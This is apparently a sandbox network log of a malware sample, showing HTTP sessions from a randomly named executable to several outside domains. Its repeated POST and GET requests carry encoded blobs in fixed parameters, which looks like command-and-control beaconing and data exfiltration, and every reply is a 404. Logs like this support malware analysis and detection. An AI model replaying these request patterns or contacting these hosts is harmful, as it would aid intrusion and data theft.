                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Nov 24, 2024 08:22:12.151643038 CET | 431 | OUT | GET /47f1/?GX6Lp2F=BO3MRbup7BgeiGzbrkvG8KshvKs5D/C7iISXRLSPWIyfeIsyuuk5G38k05LUc3hMRb3xwauQUaAEJYhYNzVT8FZPnmItglef8oIfH3xEPH5Gk5cdjw==&H8=BpFD-28hKhrD HTTP/1.1
                                                                            Host: www.bookingservice.center
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                            Nov 24, 2024 08:22:13.321402073 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                            Content-Type: text/html
                                                                            Server: Microsoft-IIS/10.0
                                                                            X-Powered-By: ASP.NET
                                                                            X-Frame-Options: SAMEORIGIN
                                                                            Date: Sun, 24 Nov 2024 07:22:12 GMT
                                                                            Connection: close
                                                                            Content-Length: 1245
                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
                                                                            Nov 24, 2024 08:22:13.321419954 CET | 218 | IN
                                                                            Data Ascii: <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            5 | 192.168.2.10 | 49862 | 103.21.221.4 | 80 | 4764 | C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Nov 24, 2024 08:22:19.310132980 CET | 712 | OUT | POST /4iun/ HTTP/1.1
                                                                            Host: www.tempatmudisini06.click
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Origin: http://www.tempatmudisini06.click
                                                                            Content-Length: 196
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Referer: http://www.tempatmudisini06.click/4iun/
                                                                            User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                            Data Ascii: GX6Lp2F=bTgLVsC6Z4yYT+RnOjxJPp3wJRhBrW70jl7GWZHlybnIE1fh+51IpVyj8OjyDIGVSBy21yU/pDnwoxsCtR8fh9axKcNReJr6ndPct8GVulHTT7dliHNm+0DvbMzP5FzfUneFu+YQ7OQTzWyewUo/l+1xm06GbMYzklzZz3BaNzVU2jvM4VzcoLXm6agN
                                                                            Nov 24, 2024 08:22:20.908935070 CET | 1033 | IN | HTTP/1.1 404 Not Found
                                                                            Connection: close
                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                            pragma: no-cache
                                                                            content-type: text/html
                                                                            content-length: 796
                                                                            date: Sun, 24 Nov 2024 07:22:20 GMT
                                                                            server: LiteSpeed
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            6 | 192.168.2.10 | 49870 | 103.21.221.4 | 80 | 4764 | C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Nov 24, 2024 08:22:21.973274946 CET | 736 | OUT | POST /4iun/ HTTP/1.1
                                                                            Host: www.tempatmudisini06.click
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Origin: http://www.tempatmudisini06.click
                                                                            Content-Length: 220
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Referer: http://www.tempatmudisini06.click/4iun/
                                                                            User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                            Data Ascii: GX6Lp2F=bTgLVsC6Z4yYQeBnMEdJIJ3xXhhBi27wjkHGWYC4yJDIFRPh/41Il1yj3uj3e4GkSB++130/pDzwox8CumIYgtaJH8NXQpr6ndPct9izukvTTLNlimNl2UDoLczPv1zTUnfSu7BY7NoTzWCewFo4q+1NoU7Lc/5XqnKh0mYUMDJs1CSLpESL78Lo0cVnLTa4nn7RoXiUcooWBCn08g==
                                                                            Nov 24, 2024 08:22:23.530997992 CET | 1033 | IN | HTTP/1.1 404 Not Found
                                                                            Connection: close
                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                            pragma: no-cache
                                                                            content-type: text/html
                                                                            content-length: 796
                                                                            date: Sun, 24 Nov 2024 07:22:23 GMT
                                                                            server: LiteSpeed
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            7 | 192.168.2.10 | 49878 | 103.21.221.4 | 80 | 4764 | C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Nov 24, 2024 08:22:24.641484976 CET | 1749 | OUT | POST /4iun/ HTTP/1.1
                                                                            Host: www.tempatmudisini06.click
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Origin: http://www.tempatmudisini06.click
                                                                            Content-Length: 1232
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Referer: http://www.tempatmudisini06.click/4iun/
                                                                            User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                            Data Ascii: GX6Lp2F=bTgLVsC6Z4yYQeBnMEdJIJ3xXhhBi27wjkHGWYC4yJLIFjHh9bNIm1yj+Oj2e4GDSBW6135IpALw6HwC6CUY5daJbMNSeJq4nZqbt9yzukvTTNhlynNl0UDvbMzb5Fz/UnWnu7NI68IT02Se23A41O1Ll06Yc/1IqnXY0m9BMBZs2l2RyUaxharIyqxZH3SKqH6BuHKrJ54FLBqmsvpEQX5rq9rBznL3Ti/kcnTq81OWkFJvOMYKKYR9haQ4Kqmqkm4frL8AZ5Qu7857vU83vjEnhdTobRzlV/IBw+oDR1+kdXCxKcj4SA5BvX83y33LLKzZuGhwYNJyhlWtTGWh1iuJOsqkL0FKt+Fhu+P0jH9O2wLS9ZyjecKDMcJSAUS3zDARgbvANShTUbK0kkQ/Ybc0vTX7eu6HiXZ7xNiUgDGCdgA2FI7PigK9UAh9lbrliaVBIRAImpTbc8YxG90k9IE/YUFK6HHgcv5kA/56pt1I5HvHMksEMOPc0r/jlkGfnS8Bq2sAlPxoPZ6EK7PivQb0Ro0KoYfVdfk0gvy1NC3wkIaBBpGf/cpb/ghv6aGgJME/g+klJ9tcWxUUIBGKtQZUQq7Kg9UZlgP+Rzmk06+7QTmZidPFeXwnb2afAR63xJJkrPL6G6it1f+cc5xTHFBcDLrbXKakolvY+0sQRxc9TXRY5jJFsUrgbn6qbj9uLZtHjFkigWkezDXNbHIMRq9o5bH0fhbg2ifxF24c1Nya8YtqwRqGJd0mGP2lAHd3rLoXOCvGw26YahPnHt5inWzVFIi7K/IwivD650ITdCJwlBJLyl6u4h9QN/RHmOJTNP4Cubu0l41Fruj+v/KyPgGNRjHripElJhpZeneL/kUA9kgxrNwBFq7/uhybIRweVU+5QnoIxqijqMfHrHoX5e35cYVhKjjH+AyK/Yw4cj7Y7v7jmp7yGVR71ZJG2An/OLJWgv53U+evq/8DMRtPxA/Pz3AcRWXP9hGRn3aBcvbF [TRUNCATED]
                                                                            Nov 24, 2024 08:22:26.222321987 CET | 1033 | IN | HTTP/1.1 404 Not Found
                                                                            Connection: close
                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                            pragma: no-cache
                                                                            content-type: text/html
                                                                            content-length: 796
                                                                            date: Sun, 24 Nov 2024 07:22:25 GMT
                                                                            server: LiteSpeed
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                            Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                                            8    192.168.2.10    49885    103.21.221.4    80    4764    C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe
                                                                            Timestamp    Bytes transferred    Direction    Data
                                                                            Nov 24, 2024 08:22:27.292931080 CET    432    OUT    GET /4iun/?GX6Lp2F=WRIrWbi0RdvATvg+JEodCsmxHRk8nC/+xgGLR7bozazeHzvdprVUl2vczsb3bYqlYyiGziBj+UW2kzFAiywpudeeEuZLaZHAlqHDud2TkhyZZeYQxg==&H8=BpFD-28hKhrD HTTP/1.1
                                                                            Host: www.tempatmudisini06.click
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                            Nov 24, 2024 08:22:28.903328896 CET    1033    IN    HTTP/1.1 404 Not Found
                                                                            Connection: close
                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                            pragma: no-cache
                                                                            content-type: text/html
                                                                            content-length: 796
                                                                            date: Sun, 24 Nov 2024 07:22:28 GMT
                                                                            server: LiteSpeed
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                            Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                                            9    192.168.2.10    49901    154.23.184.95    80    4764    C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe
                                                                            Timestamp    Bytes transferred    Direction    Data
                                                                            Nov 24, 2024 08:22:34.781830072 CET    673    OUT    POST /lazq/ HTTP/1.1
                                                                            Host: www.hm35s.top
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Origin: http://www.hm35s.top
                                                                            Content-Length: 196
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Referer: http://www.hm35s.top/lazq/
                                                                            User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                            Data Ascii: GX6Lp2F=bv8vV/gVAlzxmpOn3CBpk74ZFoc4egQYIgScKhGKHrG3iUHKb96Whk9uEaYRLhx/FFpL78ffdACwr+Zxyb8bbjLMQ0X91IiZIjhaIbMiNmUC+d0RYIr/LxfSTtZ7yprTnHgaNPlI23eRFXOFqJlXaCpAyMLsdDqBHhaQAu0Qvqh4PdFB+ITHwhW8/gXt
                                                                            Nov 24, 2024 08:22:36.342447996 CET    312    IN    HTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Sun, 24 Nov 2024 07:22:36 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 148
                                                                            Connection: close
                                                                            ETag: "66a5f968-94"
                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                            Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                                            10    192.168.2.10    49909    154.23.184.95    80    4764    C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe
                                                                            Timestamp    Bytes transferred    Direction    Data
                                                                            Nov 24, 2024 08:22:37.439878941 CET    697    OUT    POST /lazq/ HTTP/1.1
                                                                            Host: www.hm35s.top
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Origin: http://www.hm35s.top
                                                                            Content-Length: 220
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Referer: http://www.hm35s.top/lazq/
                                                                            User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                            Data Ascii: GX6Lp2F=bv8vV/gVAlzxnJen4BZpzr4aAoc4HQRRIgecKgykHZS3j13Ka4OWgk9uLKYQPhxCFFVD7+LfdAmwr/pxyq8YazLObUX74oiZIjhaIbpFNmMC/tkRJcH4IxfVUtZ72prpnHgCNO5u21mRFSqFqYlWDSp8vcKsdzrSHQCJFfslxpJEFc4GvZyQjWKyxmiH24uU1nChkhuL7lxIFAGbWw==
                                                                            Nov 24, 2024 08:22:39.021914959 CET    312    IN    HTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Sun, 24 Nov 2024 07:22:38 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 148
                                                                            Connection: close
                                                                            ETag: "66a5f968-94"
                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                            Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                                            11    192.168.2.10    49915    154.23.184.95    80    4764    C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe
                                                                            Timestamp    Bytes transferred    Direction    Data
                                                                            Nov 24, 2024 08:22:40.101125956 CET    1710    OUT    POST /lazq/ HTTP/1.1
                                                                            Host: www.hm35s.top
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Origin: http://www.hm35s.top
                                                                            Content-Length: 1232
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Referer: http://www.hm35s.top/lazq/
                                                                            User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                            Data Ascii: GX6Lp2F=bv8vV/gVAlzxnJen4BZpzr4aAoc4HQRRIgecKgykHYq3jHPKV/iWnk9uN6YVPhxTFF9H7+GkdCuwrZ9x54UYQzLOU0X+1IiQIjQTIb5FNmMC/rARZ4r4ERfSTtZ3ypqGnHY8NPNY2EGRFyaFoq9WLSpE8sKCdzmKHUivFfIbxphEItJfqYK4/1eE1U6l9vK83Vq9ykjfv085RT7KFIqNqT8fVjCLBUXgAq4wxD2cCdwUGw+JZuJevo5QxzTjbAyHOHu5wvhn7SpwEs4BP/+tqX/q+BUXnIwouL7x63t0c1xGPp6y9+MCKlpod6wHSfnqJaprgQjC4r6RVgdZ4Zb01QzE2b4ZZrcYtHlKovYQdMYj/YtEMsmPqwRZpLB1sHPpYNUJ5OgUY9IbV0gpnIHWxudlGVODRxqBh2DxCHgr6Wrm5u/z61900aZsM1YQ3y6xn+cWCR7nfH3vcUshmYG+9qRsXam0yv6swYwiMH7Ev9+yge4DgPnAHcmDkbqIVHoNgOCvB5nA4qbHCu0FE/1VtycNG6Y7PjoH24fsvfBg8/VvWRcc/ngQkd1APiwZwIfPRL1yUa/+izU2VPXEQUBXqIf/FncudTXjSRVoOCOqu+dUqF8V6v7bd0CWajE0iYBuvVG5zdhTV0tpwsKyfzWq8Grjqv3AaULomQl2mPxLKBsgIBBIz0XUmAT//DyGh/ujkwoiGIlXo1uwi/q9Ah455z+f9UCyZgtlyuilFc2iQ+XgKLRNOzKZjLEsqSAtg8ssQySlrm16G43QWce5/Jx9oSFKOTCkVBErYrRihAbPQAKCoxXtHX3xi3m0sJih+RvMng8Az92tim202r8MKdM1U67sy9DcUu1JVHgK46GbdFxjTm3M2gZw3Y5EOJSQm+d+9X1xvlB4UHlH8bdcWcdaCwjo8pOsLOtGLiesAlLIITgpkEglh/4nOIzfw2Rnn8uHHZNVlZo7OVdcHCHzUR4e04nnO23b9m3GGWGbTPyM03oH [TRUNCATED]
                                                                            Nov 24, 2024 08:22:41.697002888 CET    312    IN    HTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Sun, 24 Nov 2024 07:22:41 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 148
                                                                            Connection: close
                                                                            ETag: "66a5f968-94"
                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                            Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                                            12    192.168.2.10    49923    154.23.184.95    80    4764    C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe
                                                                            Timestamp    Bytes transferred    Direction    Data
                                                                            Nov 24, 2024 08:22:42.762362957 CET    419    OUT    GET /lazq/?GX6Lp2F=WtUPWIBoeWip1ayhwxY4grkqBqE3elVyJELTKTyKd72UqlXqOtyJmls3NLQwFRx/IHhzkpCNBmP7jtEA+bMkVSnofUD39ICOc0FIB5gcPzcC3Y1kKg==&H8=BpFD-28hKhrD HTTP/1.1
                                                                            Host: www.hm35s.top
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                            Nov 24, 2024 08:22:44.325042009 CET    312    IN    HTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Sun, 24 Nov 2024 07:22:44 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 148
                                                                            Connection: close
                                                                            ETag: "66a5f968-94"
                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                            Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                                            13    192.168.2.10    49939    88.198.8.150    80    4764    C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe
                                                                            Timestamp    Bytes transferred    Direction    Data
                                                                            Nov 24, 2024 08:22:50.128062010 CET    700    OUT    POST /2lci/ HTTP/1.1
                                                                            Host: www.snehasfashion.shop
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Origin: http://www.snehasfashion.shop
                                                                            Content-Length: 196
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Referer: http://www.snehasfashion.shop/2lci/
                                                                            User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                            Data Ascii: GX6Lp2F=oUpW0YhmY+UamE+XpdzGa234gYzZLfgDOoKHeVwLo6elcPfwSBpfSpfUsTYrrVLNid3v/gaIpMVHB/3KmGloFy+DX8+q+t55VXs8NgWNVsZHxESL5rLzScuAf+Q+LxjlN+PeyPhv/pGkKhqy3weIJan73WsCjg2hGOQGSFgEVUIkBgrD7uzXl6CUyztS
                                                                            Nov 24, 2024 08:22:51.531012058 CET    1236    IN    HTTP/1.1 404 Not Found
                                                                            Connection: close
                                                                            x-powered-by: PHP/8.1.29
                                                                            cache-control: no-cache, private
                                                                            content-type: text/html; charset=UTF-8
                                                                            content-length: 1992
                                                                            content-encoding: br
                                                                            vary: Accept-Encoding
                                                                            date: Sun, 24 Nov 2024 07:22:51 GMT
                                                                            Nov 24, 2024 08:22:51.531039000 CET    1005    IN


                                                                            Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                                            14    192.168.2.10    49945    88.198.8.150    80    4764    C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe
                                                                            Timestamp    Bytes transferred    Direction    Data
                                                                            Nov 24, 2024 08:22:52.798949003 CET    724    OUT    POST /2lci/ HTTP/1.1
                                                                            Host: www.snehasfashion.shop
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Origin: http://www.snehasfashion.shop
                                                                            Content-Length: 220
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Referer: http://www.snehasfashion.shop/2lci/
                                                                            User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                            Data Ascii: GX6Lp2F=oUpW0YhmY+UamkOXlaHGS233u4zZQvgHOoWHeUFOoJqlFuvwTFdfRpfU0jYyz1LSidyF/iOIpMBHB9vKmV9rEi+FOs+o6t55VXs8NgC3VsBHx0CLo6LyOMuDJuQ+BRiNN+PwyOtF/q+kKi+y5CmLSKnxqGsJtTTuDf4IXkM3IkUhGBWEq/SA2Nea81Y4kQGpi4fWi290iD/ZwhGDFA==
                                                                            Nov 24, 2024 08:22:54.225421906 CET    1236    IN    HTTP/1.1 404 Not Found
                                                                            Connection: close
                                                                            x-powered-by: PHP/8.1.29
                                                                            cache-control: no-cache, private
                                                                            content-type: text/html; charset=UTF-8
                                                                            content-length: 1992
                                                                            content-encoding: br
                                                                            vary: Accept-Encoding
                                                                            date: Sun, 24 Nov 2024 07:22:53 GMT
                                                                            Nov 24, 2024 08:22:54.225461960 CET    1005    IN


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            15 | 192.168.2.10 | 49952 | 88.198.8.150 | 80 | 4764 | C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Nov 24, 2024 08:22:55.458304882 CET | 1737 | OUT | POST /2lci/ HTTP/1.1
                                                                            Host: www.snehasfashion.shop
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Origin: http://www.snehasfashion.shop
                                                                            Content-Length: 1232
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Referer: http://www.snehasfashion.shop/2lci/
                                                                            User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                            Nov 24, 2024 08:22:56.965395927 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                            Connection: close
                                                                            x-powered-by: PHP/8.1.29
                                                                            cache-control: no-cache, private
                                                                            content-type: text/html; charset=UTF-8
                                                                            content-length: 1992
                                                                            content-encoding: br
                                                                            vary: Accept-Encoding
                                                                            date: Sun, 24 Nov 2024 07:22:56 GMT
                                                                            Nov 24, 2024 08:22:56.965426922 CET | 1005 | IN


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            16 | 192.168.2.10 | 49959 | 88.198.8.150 | 80 | 4764 | C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Nov 24, 2024 08:22:58.126352072 CET | 428 | OUT | GET /2lci/?GX6Lp2F=lWB23sttXuwU7VKah9TQdWzGmdySIZI8VeHdcV4a5pKuSPzOO09MVK+LpGEounTDi5Cb1FGE36E3AeLK+XZDNFSbRcaQ2LBAWGtnFx6vVohs8RPjrA==&H8=BpFD-28hKhrD HTTP/1.1
                                                                            Host: www.snehasfashion.shop
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                            Nov 24, 2024 08:22:59.499217033 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                            Connection: close
                                                                            x-powered-by: PHP/8.1.29
                                                                            cache-control: no-cache, private
                                                                            content-type: text/html; charset=UTF-8
                                                                            content-length: 6603
                                                                            date: Sun, 24 Nov 2024 07:22:59 GMT
                                                                            Nov 24, 2024 08:22:59.499258041 CET | 1236 | IN
                                                                            Nov 24, 2024 08:22:59.499264956 CET | 1236 | IN
                                                                            Nov 24, 2024 08:22:59.499475002 CET | 1236 | IN
                                                                            Nov 24, 2024 08:22:59.499481916 CET | 896 | IN
                                                                            Nov 24, 2024 08:22:59.499488115 CET | 967 | IN


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            17 | 192.168.2.10 | 49976 | 172.67.162.39 | 80 | 4764 | C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe
